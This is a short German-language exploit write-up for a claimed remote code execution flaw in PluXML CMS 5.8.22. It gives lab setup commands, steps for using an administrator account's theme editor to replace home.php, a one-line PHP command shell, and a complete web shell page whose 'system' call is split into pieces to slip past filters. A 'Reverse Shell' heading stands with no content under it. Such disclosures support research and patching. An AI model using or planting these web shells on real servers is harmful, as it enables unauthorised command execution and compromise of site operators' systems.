
Eine kritische Schwachstelle zur Remote-Code-Ausführung (RCE) wurde in PluXML CMS Version 5.8.22 identifiziert. Diese Schwachstelle ermöglicht es authentifizierten Administratoren, beliebigen PHP-Code auf dem Webserver auszuführen, indem sie schädliche PHP-Webshells über die Theme-Editor-Funktion hochladen.
git clone https://github.com/pluxml/PluXml.git
cd PluXml
ddev config --project-type=php --php-version=8.1 --docroot=.
ddev start
Schritt-für-Schritt-Ausnutzung
Authentifizierung: Melden Sie sich mit gültigen Administrator-Anmeldedaten im PluXML-Administrationspanel an. Navigieren Sie zum Theme-Editor:
Rufen Sie das Administrations-Dashboard auf.
Navigieren Sie zu: Themes → Home.php → Bearbeiten

Schädliche Payload injizieren:
Ersetzen Sie den vorhandenen Inhalt in home.php durch eine PHP-Web-Shell.
Beispiel-Payload: <?php system($_GET['cmd']); ?>
Speichern Sie die geänderte Datei.
Ausführung auslösen:
Rufen Sie die Hauptstartseite der Website auf. Der injizierte PHP-Code wird mit den Rechten des Webservers ausgeführt.
Reverse Shell

Payload der Webshell
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input
type="TEXT"
name="cmd"
autofocus
id="cmd"
size="80"
>
<input
type="SUBMIT"
value="Execute"
>
</form>
<pre>
<?php
if (isset($_GET['cmd'])) {
$func_name = "sys" . "tem";
$func_name($_GET['cmd']);
}
?>
</pre>
</body>
</html>

